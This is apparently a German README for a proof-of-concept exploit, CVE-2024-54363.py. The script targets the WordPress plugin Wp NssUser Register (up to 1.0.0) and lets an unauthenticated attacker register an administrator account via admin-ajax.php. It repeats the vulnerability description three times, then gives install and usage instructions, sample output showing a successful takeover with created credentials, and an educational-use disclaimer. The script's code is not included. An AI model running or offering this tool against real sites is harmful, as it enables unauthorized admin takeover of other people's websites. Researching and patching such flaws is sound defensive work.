
Unzulässige Zuweisung von Berechtigungen in nssTheme Wp NssUser Register ermöglicht eine Privilegieneskalation. Dieses Problem betrifft Wp NssUser Register: von n/a bis 1.0.0.
Fehlerhafte Zuweisung von Berechtigungen in nssTheme Wp NssUser Register ermöglicht eine Privilegienausweitung. Dieses Problem betrifft Wp NssUser Register: von n/a bis 1.0.0.
Das Plugin nssTheme Wp NssUser Register für WordPress ist anfällig für ein Problem mit fehlerhafter Zuweisung von Berechtigungen, das zu einer Privilegienausweitung führt. Diese Schwachstelle erlaubt es einem Angreifer, ohne ordnungsgemäße Autorisierung einen neuen Benutzer mit Administratorrechten zu registrieren. Das Problem betrifft Plugin-Versionen bis einschließlich 1.0.0.
Wp NssUser Register1.0.0/wp-admin/admin-ajax.php bei aktivierter Registrierung.pip install -r requirements.txt
usage: CVE-2024-54363.py [-h] -u URL
Wp NssUser Register <= 1.0.0 - Unauthenticated Privilege Escalation
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site
The site http://target-wordpress-site.com is vulnerable. Exploitation in progress...
Exploitation successful!
Username: nxploit123
Password: nxploit
Dieses Skript dient ausschließlich Bildungszwecken. Der Autor übernimmt keine Verantwortung für Schäden, die durch die missbräuchliche Verwendung dieses Skripts entstehen.